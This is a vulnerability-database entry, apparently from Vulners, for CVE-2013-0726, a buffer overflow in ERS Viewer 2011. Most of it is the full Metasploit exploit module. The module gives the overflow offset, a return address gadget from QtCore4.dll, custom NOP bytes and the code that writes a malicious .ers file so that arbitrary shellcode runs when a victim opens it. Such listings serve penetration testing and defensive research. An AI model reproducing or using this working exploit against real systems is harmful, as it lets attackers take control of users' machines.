ERS Viewer 2011 ERS File Handling Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

ERS Viewer 2011 ERS File Handling Buffer Overflow vulnerability in ermapper_u.dll allows arbitrary code execution via crafted .ers file


                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      &#39;Name&#39;           =&#62; &#34;ERS Viewer 2011 ERS File Handling Buffer Overflow&#34;,
      &#39;Description&#39;    =&#62; %q{
          This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
        (version 11.04). The vulnerability exists in the module ermapper_u.dll where the
        function ERM_convert_to_correct_webpath handles user provided data in a insecure
        way. It results in arbitrary code execution under the context of the user viewing
        a specially crafted .ers file. This module has been tested successfully with ERS
        Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
      },
      &#39;License&#39;        =&#62; MSF_LICENSE,
      &#39;Author&#39;         =&#62;
        [
          &#39;Parvez Anwar&#39;, # Vulnerability Discovery
          &#39;juan vazquez&#39; # Metasploit
        ],
      &#39;References&#39;     =&#62;
        [
          [ &#39;CVE&#39;, &#39;2013-0726&#39; ],
          [ &#39;OSVDB&#39;, &#39;92694&#39; ],
          [ &#39;BID&#39;, &#39;59379&#39; ],
          [ &#39;URL&#39;, &#39;http://secunia.com/advisories/51725/&#39; ]
        ],
      &#39;Payload&#39;        =&#62;
        {
          &#39;Space&#39;    =&#62; 7516,
          &#39;BadChars&#39; =&#62; &#34;\x22\x5c&#34; +
            (0x7f..0xff).to_a.pack(&#34;C*&#34;) +
            (0x00..0x08).to_a.pack(&#34;C*&#34;) +
            (0x0a..0x1f).to_a.pack(&#34;C*&#34;),
          &#39;DisableNops&#39; =&#62; true,
          &#39;EncoderOptions&#39; =&#62;
            {
              &#39;BufferRegister&#39; =&#62; &#39;ESP&#39;
            }
        },
      &#39;SaveRegisters&#39;  =&#62; [ &#39;ESP&#39; ],
      &#39;DefaultOptions&#39;  =&#62;
        {
          &#39;ExitFunction&#39; =&#62; &#34;process&#34;,
        },
      &#39;Platform&#39;       =&#62; &#39;win&#39;,
      &#39;Targets&#39;        =&#62;
        [
          [ &#39;ERS Viewer 2011 (v11.04)  / Windows XP SP3 / Windows 7 SP1&#39;,
            {
              &#39;Offset&#39; =&#62; 260,
              &#39;Ret&#39; =&#62; 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
            }
          ],
        ],
      &#39;Privileged&#39;     =&#62; false,
      &#39;DisclosureDate&#39; =&#62; &#34;Apr 23 2013&#34;,
      &#39;DefaultTarget&#39;  =&#62; 0))

    register_options(
      [
        OptString.new(&#39;FILENAME&#39;, [ true, &#39;The file name.&#39;,  &#39;msf.ers&#39;]),
      ], self.class)

  end

  # Rewrote it because make_nops is ignoring SaveRegisters
  # and corrupting ESP.
  def make_nops(count)
    return &#34;\x43&#34; * count # 0x43 =&#62; inc ebx
  end

  def exploit

    buf = rand_text(target[&#39;Offset&#39;])
    buf &#60;&#60; [target.ret].pack(&#34;V&#34;)
    buf &#60;&#60; make_nops(8) # In order to keep ESP pointing to the start of the shellcode
    buf &#60;&#60; payload.encoded

    ers = %Q|
DatasetHeader Begin
  Name    = &#34;#{buf}&#34;
DatasetHeader End
    |

    file_create(ers)
  end
end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1